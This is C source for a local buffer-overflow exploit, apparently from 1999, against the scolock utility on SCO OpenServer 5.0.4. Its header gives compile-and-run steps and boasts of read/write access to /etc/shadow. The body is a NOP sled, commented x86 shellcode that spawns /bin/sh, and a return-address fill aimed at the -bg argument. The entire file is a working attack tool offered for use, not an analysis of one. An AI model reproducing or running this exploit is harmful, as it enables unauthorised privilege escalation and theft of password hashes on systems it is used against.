/*
 * <scolockx.c> Local exploit - Gives you an auth group suid shell
 *
 * h0h0h0!! auth group has read/write access to /etc/shadow (w3 4r3 r00t!)
 *
 * $ ls -al /etc/shadow
 * -rw-rw----   1 root     auth         323 Jun 14 23:09 /etc/shadow
 *
 * Offset: scolockx (SCO OpenServer 5.0.4)
 * 0 -> with -display parameter
 *
 * Usage:
 * $ cc scolockx.c -o scolockx
 * $ /usr/bin/X11/scolock -display 1.1.1.1:0 -bg `scolockx 0`
 *
 * Note: scolock need to be run from a valid x-display
 *
 * By: The Dark Raver of CPNE (Murcia/Spain - 28/6/99)
 *
 * <http://members.tripod.com/~ochodedos>; - <doble@iname.com>;
 *
 */


#include <stdlib.h>
#include <stdio.h>
char hell[]=
  "\xeb\x16" // start: jmp uno
  "\x5e" // dos: popl %esi
  "\x31\xdb" // xorl %ebx,%ebx
  "\x89\x5e\x07" // movb %bl,0x7(%esi)
  "\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
  "\x88\x5e\x11" // movb %bl,0x11(%esi)
  "\x31\xc0" // xorl %eax,%eax
  "\xb0\x3b" // movb $0x3b,%al
  "\x53" // pushl %ebx
  "\x53" // pushl %ebx
  "\x56" // pushl %esi
  "\x56" // pushl %esi
  "\xeb\x10" // jmp execve
  "\xe8\xe5\xff\xff\xff" // uno: call dos
  "/bin/sh"
  "\xaa\xaa\xaa\xaa"
  "\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0


#define OFF 0x8047a98   // SCO OpenServer 5.0.4
#define ALINEA 0
#define LEN 2000


int main(int argc, char *argv[])
{

  int offset=0;
  char buf[LEN];
  int i;

  if(argc < 2)
    {
      printf("Usage: scolockx <offset>\n");
      exit(0);
    }
  else
    {
      offset=atoi(argv[1]);
    }

  memset(buf,0x90,LEN);
  memcpy(buf+1000,hell,strlen(hell));
  for(i=1100+ALINEA;i<LEN-4;i+=4)
    *(int *)&buf[i]=OFF+offset;
  for(i=0;i<LEN;i++)
    putchar(buf[i]);

  exit(0);
}

/*                    www.hack.co.za              [2000]*/